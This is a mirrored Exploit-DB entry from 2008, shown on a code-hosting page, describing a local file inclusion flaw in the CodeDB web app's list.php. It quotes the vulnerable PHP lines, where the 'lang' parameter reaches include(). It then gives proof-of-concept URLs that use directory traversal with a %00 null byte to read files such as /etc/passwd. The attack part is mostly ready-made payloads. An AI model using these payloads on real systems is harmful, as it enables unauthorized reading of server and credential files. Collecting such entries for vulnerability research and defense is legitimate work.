bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6071.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

28 lines
No EOL
907 B
Text
Raw Blame History

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00
EoF.
# milw0rm.com [2008-07-14]
Reference in a new issue View git blame Copy permalink